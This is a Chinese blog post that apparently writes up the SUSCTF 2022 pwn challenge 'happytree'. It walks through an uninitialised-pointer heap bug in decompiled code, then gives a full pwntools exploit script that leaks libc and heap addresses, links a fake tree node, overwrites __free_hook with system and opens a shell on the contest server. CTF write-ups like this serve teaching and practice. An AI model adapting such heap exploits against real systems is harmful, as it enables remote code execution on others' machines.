[susctf2022-pwn] 02-happytree

最新推荐文章于 2024-05-12 11:14:01 发布
最新推荐文章于 2024-05-12 11:14:01 发布
阅读量418 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123187282
版权

早晨才看到比赛,9点就结束。结束后作了一道题。

堆有漏洞大概有3个:UAF,写溢出,未初始化指针。其中未初始化指针是最难找了,一般想不到。不过也有个办法如果找不着前边两个就找后边这个。

题目有add,show,free三个函数。其中add有两个未初始化指针:

__int64 __fastcall m1add(__int64 a1, __int64 a2, unsigned int a3)
{
  __int64 v5; // [rsp+10h] [rbp-10h]

  v5 = a2;
  if ( a2 )
  {
    if ( (signed int)a3 >= *(_DWORD *)a2 )
    {
      if ( (signed int)a3 > *(_DWORD *)a2 )
        *(_QWORD *)(a2 + 24) = m1add(a2, *(_QWORD *)(a2 + 24), a3);
    }
    else
    {
      *(_QWORD *)(a2 + 16) = m1add(a2, *(_QWORD *)(a2 + 16), a3);
    }
  }
  else
  {
    v5 = operator new(0x20uLL);                 // 管理块: int:size; *msg; *left; *right 左右指针未初始化
    *(_DWORD *)v5 = a3;
    *(_QWORD *)(v5 + 8) = operator new[]((unsigned __int8)a3);// 4字节无符号整数仅建1字节无符号数块
    std::operator<<<std::char_traits<char>>(&std::cout, "content: ");
    read(0, *(void **)(v5 + 8), (unsigned __int8)a3);// 有残留,可以得到libc
  }
  return v5;
}

管理块块结构:

struct{int size;char *msg;char *left;char *right;}

这里在free时有个小坑,如果释放的节点同时有左右子树,则释放右子树的最左叶子。这个看了半天,结果完全没用,人家想释放谁释放谁,就这么定的。

基本思路:

  1. 因为在读入数据的时候用的read,所以有残留。可以很容易得到堆地址和libc地址;
  2. 申请一个0x41的块释放掉,找到堆里的偏移。将来用这个管理块作个fake链入树中;
  3. 申请0x31块(管理块同大),左树位置写fake指针(刚释放块size位置为0,比存在的小)释放;
  4. 先用掉第1个0x31管理块,再申请第2个块(left->fake)这时fake被链入树中;
  5. 释放fake块得到loop然后就是free_hook写system。

完整exp:

from pwn import *

'''
patchelf --set-interpreter /home/shi/libc-2.27-3ubuntu1.2/lib/x86_64-linux-gnu/ld-2.27.so pwn
patchelf --add-needed /home/shi/libc-2.27-3ubuntu1.2/lib/x86_64-linux-gnu/libc-2.27.so pwn
patchelf --add-needed /home/shi/libc-2.27-3ubuntu1.2/lib/x86_64-linux-gnu/libm-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

def connect(local=1):
    global p
    
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('124.71.147.225', 9999) 

libc_elf = ELF('/home/shi/libc-2.27-3ubuntu1.2/lib/x86_64-linux-gnu/libc-2.27.so')
one = [0x4f365, 0x4f3c2, 0x10a45c]
libc_start_main_ret = 0x21b97
context(arch='amd64')

menu = b"cmd> "
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"data: ", str(size).encode())
    p.sendafter(b"content: ", msg)

def free(size):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'data: ', str(size).encode())

def show(size):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'data: ', str(size).encode())

def pwn():
    #libc
    [add(0x80+i, b'A') for i in range(8)]
    [free(0x80+7-i) for i in range(8)]
    add(0x70, b'A'*8)
    show(0x70)
    p.recvuntil(b'A'*8)
    libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) -0x80 - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0]
    print('libc:', hex(libc_base))
    free(0x70)

    #heap
    add(0x20, b'\xb0')
    show(0x20)
    p.recvuntil(b'content: ')
    heap_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x120b0
    print('heap:', hex(heap_base))
    free(0x20)
    
    #作个0x41将来double free,现在先释放一次
    add(0x30, b'X'*0x30)
    free(0x30)
    #确定上步0x41块的管理块地址
    t_chunk = heap_base + 0x11e70 #ec0->ef0:0x41
    print('fake:',hex(t_chunk))
    #将管理块同大的块写入fake指针,残留将留在管理块,释放两个0x31块,第2个有残留
    add(0x20, flat(0,0,t_chunk,0))
    free(0x20)
    #用掉第1个0x31块
    add(0x90, b'/bin/sh\x00')
    #第2个0x31,残留fake作为子树链入
    add(0x10, b'B') #left->fake
    #释放fake得到0x41环
    free(0)
    #
    add(0x30, p64(libc_elf.sym['__free_hook']))
    add(0x31, b'/bin/sh\x00')
    add(0x32, p64(libc_elf.sym['system']))
    
    free(0x90)

    p.sendline(b'cat /flag')
    p.interactive()

connect(0)
pwn()

#SUSCTF{We_4re_pl4ying_unDer_th3_tRee}

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
java读取txt文档
Jmutor
07-05 945
import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.io.InputStreamReader; import java.io.U
CTF-PWN学习-为缺少指导的同学而生
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
最新发布
2401_84970145的博客
05-12 1064
CTF中PWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。:利用反汇编等途径查看源代码并对程序进行理解的过程**调试:**程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。
CTF中pwn的入门指南
信息安全专题
10-21 6950
CTF中pwn的入门指南 pwn简介: CTF中的pwn指的是通过通过程序本身的漏洞,编写利用脚本破解程序拿到主机的权限,这就需要对程序进行分析,了解操作系统的特性和相关漏洞,是是一个难度比较大的分支。   接下来介绍相关的学习思路(自己总结的,当作参考) 0x01 基础知识准备   pwn相对于web,更需要专业的技能和知识,最主要的是要学会如何分析程序,这就需要有足够的准备 c语言 汇编语言 python 操作系统 linux操作   C语言是最基础的,当下的比赛大部分的pwn题目使用
CTF总结-PWN
qq_42747131的博客
05-14 6868
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1537
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 2458
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CTF学习笔记——PWN(入门)
weixin_66578482的博客
10-08 2227
🚀🚀这篇笔记是我对自己初步学习CTF的一个小总结,主要涉及了PWN板块的入门题型,比如栈溢出等,这部分内容比较简单,算是对PWN形成一个简单的概念,来帮助我们进行后面的学习,本文没有很多基础知识的介绍,主要集中在题目的总结,所以此篇笔记主要起到一个分析总结的作用。CTF学习笔记——PWN(入门) PWN基础概念 NC题 [HGAME 2023 week1]test_nc 栈溢出 [HNCTF 2022 Week1]easyoverflow 伪随机数 [SWPUCTF 2022 新生赛]Darling
从零开始搭建Ubuntu CTF-pwn环境
热门推荐
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
CTF PWN基础知识(寄存器、栈、汇编指令、标志位)详解
weixin_43780092的博客
09-04 5338
本文详解PWN中基础知识,文中寄存器缩写都有标注上中文含义,方便初学者理解记忆。
老表带你学Linux kernel pwn 入门(三)
weixin_43889007的博客
11-12 482
double fetch 条件竞争
CTF 一次PWN解题的小技巧
顶峰
03-28 1105
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。
ctf-pwn入门知识
weixin_41038905的博客
04-06 2708
CTF中的pwn指的是通过通过程序本身的漏洞编写利用脚本破解程序拿到主机的权限 了解简单的软件防护技术: 栈保护:Canary 堆栈不可执行:NX(No-eXecute) 地址随机化:PIE(position-independent executable, 地址无关可执行)或者叫ALSR(address space layout randomization) ROP(Return-Oriented...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值